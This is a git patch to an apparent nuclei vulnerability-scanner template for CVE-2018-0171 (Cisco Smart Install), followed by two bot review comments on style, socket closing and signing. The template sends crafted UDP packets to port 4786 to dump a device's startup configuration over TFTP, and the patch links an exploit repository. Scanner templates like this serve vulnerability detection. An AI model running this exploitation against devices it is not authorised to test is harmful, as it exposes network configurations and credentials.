From fc9e4f85014f6c8a1fa9f5fc3bbd4cbdfe14f5c7 Mon Sep 17 00:00:00 2001
From: Matej Smycka
Date: Mon, 25 Aug 2025 20:04:09 +0200
Subject: [PATCH] feat: make CVE-2018-0171 stable and add additional info
---
 javascript/cves/2018/CVE-2018-0171.yaml | 25 +++++++++++++++++++------
 1 file changed, 19 insertions(+), 6 deletions(-)
diff --git a/javascript/cves/2018/CVE-2018-0171.yaml b/javascript/cves/2018/CVE-2018-0171.yaml
index 125f3912629..261815230d4 100644
--- a/javascript/cves/2018/CVE-2018-0171.yaml
+++ b/javascript/cves/2018/CVE-2018-0171.yaml
@@ -2,13 +2,15 @@ id: CVE-2018-0171
 info:
 name: Cisco Smart Install - Configuration Download
- author: ritikchaddha
+ author: ritikchaddha, matejsmycka
 severity: critical
 description: |
- Checks if TFTP service becomes available after Smart Install exploitation. This template should be run after the configuration extraction payload to verify that the device is now serving configuration files via TFTP.
+ A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device.
+ This script sends crafted packets to the Cisco Smart Install port (4786) and dumps the startup configuration via TFTP.
 reference:
 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
 - https://nvd.nist.gov/vuln/detail/CVE-2018-0171
+ - https://github.com/AlrikRr/Cisco-Smart-Exploit
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
@@ -19,7 +21,7 @@ info:
 verified: true
 max-request: 2
 shodan-query: 'port:4786 "Smart Install"'
- tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev
+ tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev,udp
 flow: tcp(1) && javascript(1)
@@ -52,7 +54,14 @@ javascript:
 let c = require("nuclei/net");
 let conn = c.Open('udp', `${Host}:${Port}`);
 conn.SendHex(packet.Hex());
- let resp = conn.RecvString(4096);
+ let resp = conn.Recv(4096);
+
+ // Send malformed packet otherwise TFTP will not respond for around minute
+ let packet2 = bytes.NewBuffer();
+ let message2 = "\x00\x05error"
+ packet2.WriteString(message2);
+ conn.SendHex(packet2.Hex());
+ resp;
 args:
@@ -64,6 +73,10 @@ javascript:
 words:
 - 'boot-start-marker'
 - 'version'
- - 'hostname'
+ - 'NVRAM'
 condition: and
-# digest: 4a0a004730450220524eb982d0bd03e5e5bd55cda3de7bf60f3b4177dca62eefb68ef0a395ebc8b0022100971bf57fafe0a25b7bf8cba6ff9f7fc6f283c2982a0340bf6f74952119b7d0ee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+ extractors:
+ - type: regex
+ regex:
+ - "version\\s+(\\d+\\.\\d+)"
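Review bot: The UDP connection returned by `c.Open` is never closed after the added second `SendHex`, so the socket is left for the runtime to reclaim; if nuclei's net module exposes it, add `conn.Close();` right before the final `resp;`. The new `let message2 = "\x00\x05error"` has no terminating semicolon, unlike every other statement in the hunk, and should get one rather than rely on ASI. The comment `// Send malformed packet otherwise TFTP will not respond for around minute` should name which service the second packet is addressed to and what it is meant to reset, and read `for around a minute`; as written a reader cannot tell what the packet does or why the template needs it, and it is also worth stating that the reply to this second send is intentionally not read, e.g. `// reply to the second packet is intentionally not read; resp holds the first answer`. `bytes` and `packet` are presumably declared earlier in the same `code: |` block, which starts outside this hunk.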
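Review bot: The `# digest:` trailer is removed without a replacement, so the template is no longer signed; unless the repository's signing step regenerates it on merge, the line should be re-signed rather than dropped, since an unsigned template is handled differently from a signed one by the loader. The new regex extractor `"version\\s+(\\d+\\.\\d+)"` captures the number in group 1 but does not select it, so the extracted value is the whole match (for example `version 15.2`); if only the number is wanted, add `group: 1`, and a `name:` so the value is labelled in output. Replacing the matcher word `hostname` with `NVRAM` under `condition: and` changes which responses count as a configuration dump; the commit message says this makes the template stable, so a short comment next to the words list explaining why `NVRAM` is the more reliable marker would spare the next maintainer the same investigation.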